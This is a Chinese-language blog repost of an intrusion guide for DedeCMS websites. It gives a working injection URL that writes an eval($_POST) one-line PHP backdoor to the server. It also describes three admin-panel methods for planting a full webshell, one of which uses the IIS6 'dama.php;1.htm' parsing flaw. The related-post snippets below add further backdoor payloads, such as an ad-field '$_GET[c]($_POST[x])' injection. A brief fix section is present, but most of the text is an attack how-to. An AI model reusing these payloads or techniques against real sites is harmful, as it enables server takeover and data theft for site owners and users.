dedecms网站入侵拿webshell方法总结

最新推荐文章于 2024-05-01 12:00:00 发布
最新推荐文章于 2024-05-01 12:00:00 发布
阅读量1.2k 收藏 2
点赞数
分类专栏: CMS 文章标签: PHP IIS MySQL .net 脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dangelrose/article/details/83498477
版权
dedecms网站入侵拿webshell方法 dedecms现已广泛流传,对其安全问题不易忽视!了解入侵方法做好网站安全措施。...

dedecms网站入侵拿webshell方法

文章作者:udb311

转载请注明:http://www.hackline.net/

1、注入漏洞

存在注入地址:在域名下输入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>



 



 








 

http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>

注入成功,产生了注入文件。

http://localhost:802/data/mysql_error_trace.php

一句话木马连接上传大马即可!

注入漏洞详解见
http://www.hackline.net/a/news/ldfb/2009/0830/323.html

 

2、后台拿webshell

第一种方法,利用文件管理直接创建php大马```



 

后台--核心--附件管理--文件式管理器 新建文件,写入大马文件直接访问。



 

如果没有安装文件管理器,可以查看下插件目录有没有此插件文件。

后台--模块--模块管理--文件管理器 点击安装,然后在创建php大马```



 

如果没有安装插件,并删除了插件目录就无法使用此方法。


第二种方法:利用标签源码管理

后台--模板--标签源码管理,随便选择一个标签 点编辑。文件名称输入:格式为。xxx.lib.php,内容输入大马文件即可。



 



 

第三种方法、利用模板修改。

此方法利用IIS解析漏洞,前提网站必须在IIS6.0运行。



 

后台--模板--默认模板管理,随便选择一个模板 点编辑。文件名输入dama.php;1.htm,内容输入大马文件即可。
注意,此情况输入密码可能导致跳转显示无法找到网页,你可以输入密码后,再访问dama.php;1.htm这样就可以了。因为解析时截断了文件名变成dama.php了。



 

 


目前本人对此想出以下解决办法

注入漏洞官方已有补丁,6月6号的程序更新至最新补丁即可。

标签源码在线修改,可以修改后台源文件。删除标签在线管理功能,或者改templets_tagsource.php文件名。

模板在线修改,可以通过IIS限制脚本执行。删除或者重命名templets_main.php文件```

dangelrose
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站后台拿Webshell
01-13
通过注入或者其他途径,获取网站管理员账号和密码后,找到后台登录地址,登录后,寻找后台漏洞上传网页后门,获取网站webshell webshell的作用是方便攻击者,webshell是拥有...拿webshell也是getshell的另一种叫法。
各种cms getshell技巧
qq_53742230的博客
07-08 2654
常用CMS getshell技巧
DeDecms远程写入漏洞webshell (dedecms漏洞)
aomiano55778的博客
02-19 2732
解释下Apache解析文件的流程: 当Apache检测到一个文件有多个扩展名时,如1.php.bak,会从右向左判断,直到有一个Apache认识的扩展名。如果所有的扩展名Apache都不认识,那么变会按照httpd.conf配置中所指定的方式展示这个问题,一般默认情况下是“text/plain”这种方式。 那么这样的话,像1.php.bak这样的文件名就会被当做php文件所解析。这也...
渗透实战:dedeCMS任意用户密码重置到内网getshell
wangluoanquan111的博客
05-01 602
DedeCMS 是一个基于 PHPMySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一。在使用 DedeCMS的过程中,我们需要重视其安全性,因为安全问题可能会导致网站数据泄露、网站被黑、系统被入侵等严重后果。本文将介绍如何进行 DedeCMS 安全测试。DedeCMS是一款国产的开源CMS系统,具有使用简单、功能强大、可扩展性好等特点。然而,像其他CMS系统一样,DedeCMS也存在一些安全问题,其中任意密码重置漏洞是其中一个比较严重的漏洞。
dedecms修改templets模板文件夹名字
书写人生
12-04 1008
修改templets模板文件夹的方法:   首先找到系统配置文件common.inc.php,此文件存放在Include目录下,打开common.inc.php来修改默认模板目录templets,   查找:$cfg_templets_dir = $cfg_cmspath.'/templets';   将上面的红色部分修改为想要的文件夹名称,例如:eden,修改
渗透测试-getshell方法总结
Jian Sun_的博客
02-11 3164
一、管理员权限拿shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传拿shell 国内多对上传类型进行了限制,需要在进行绕过操作 1、织梦cms后台为例子 进入后台 写入一个一句话木马 长传一个一句话木马 2、数据库备份拿shell 示例:南方数据 v7.0 良精通用企业网站管理系统 方法一: 1.先上一张图马,得到路径 2.选择数据库备份,将图马备份为a.asp 3.访问xxx/xxx/.../a.asp.
DEDECMSSHELL EXP
fengling132的专栏
04-20 850
转自:t00ls 网上流传的漏洞exp都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell   _1 U- t( B- F8 c 前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'
Dedecms 5.7 SP2后台getshell
一个安全研究员
07-02 9821
前言 最近也打算研究研究各大cms的漏洞了,正好看到一篇关于dedecms后台getshell的文章,所以也自己动手复现一下,这样以后遇到了也更容易上手。该漏洞涉及的版本是dedecms的最新版吧,下载地址: http://www.dedecms.com/products/dedecms/downloads/ 复现 版本: 我这里测试的是utf8版,这个版本应该不影响。 漏洞位...
良精南方网站系统拿webshell的教程
03-06
总结来说,良精南方网站系统拿webshell的教程涉及了网络安全中的基本攻击手段和防御策略。了解这些知识,无论是为了进行安全防护还是进行合法的渗透测试,都是必不可少的。通过深入学习和实践,我们可以更好地理解...
webshell获取总结-cookices和dedecms靶场环境
最新发布
06-12
南方数据企业网站管理系统 V7.0 后台主要功能如下: 一、系统管理:管理员管理,可以新增管理员及修改管理员密码;发布网站公告;进行网站配置;网站统计和数据库备份,为保证您的数据安全本系统采用了数据库备份...
批量getshell教程+工具
07-28
批量getshell教程+工具
45种可拿SHELL方法
03-07
45种可拿SHELL方法
dede批量Getshell
10-31
这个是百度批量的。自己保存为xx.php <...$exploit=Getshell($url); if (...% 5BGLOBALS%5D%5Bcfg_dbname%5D=de...
窃密型WebShell检测方法
01-30
近年来网站被植入后门等隐蔽性攻击呈逐年增长态势,国家互联网应急中心发布的《2013年我国互联网网络安全态势综述》称2013年国家互联网应急中心共监测发现我国境内6.1万个网站通过境外被植入后门,较2012年增长62.1%...
dedecms入侵webshell方法总结
weixin_34302561的博客
03-30 777
1、注入漏洞 存在注入地址:在域名下输入plus/digg_frame.php?action=good&amp;id=1024%651024&amp;mid=*/eval($_POST[x]);var_dump(3);?&gt; http://localhost:802/plus/digg_frame.php?action=good&amp;id=1024%651024&amp;mid=*...
DEDECMS 另类***
weixin_34258782的博客
01-06 107
本地试过…可行… 直接在DEDE根目录后面接/install/index.php会发现出现以下提示: 你已经安装过该系统,如果想重新安装,请先删除install目录的 install.lock 文件,然后再次运行该程序 直接在后面加step=2如: install/index.php?step=2 直接跳过。 数据库设定填写上远程的其...
百度站长平台“爆”dede后台直取webshell
IT技术宅-北方的刀郎
03-21 2216
百度站长平台“爆”dede后台直取webshell2013-09-08      0 个评论       作者:Rieck收藏    我要投稿利用百度站长平台找出5W“dede核心”站点,如果有技术的HEI,KE,可能把这5W条的网址给你就OK了,但我们这些低级的“小HEI”只会一些简单的注入,有些时候会遇到“账号密码”全部搞定了,但找不到后台这种事情,什么后台扫描工具用了一大堆,但还是找不到后台
另类dedecms后台拿shell
weixin_30412013的博客
05-15 491
遇到一个被阉割的后台,发现直接传shell显然不行。 然后就有了下文 添加一个新广告。 插入一句话木马: 1 --><?php $_GET[c]($_POST[x]);?><!-- 然后访问: /plus/ad_js.php?aid=42&c=assert aid后面的值是你广告的id。 转载于:https://www....
拿到webshell
07-27
- *3* [渗透测试获取webshell方法总结](https://blog.csdn.net/u013930899/article/details/127183667)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值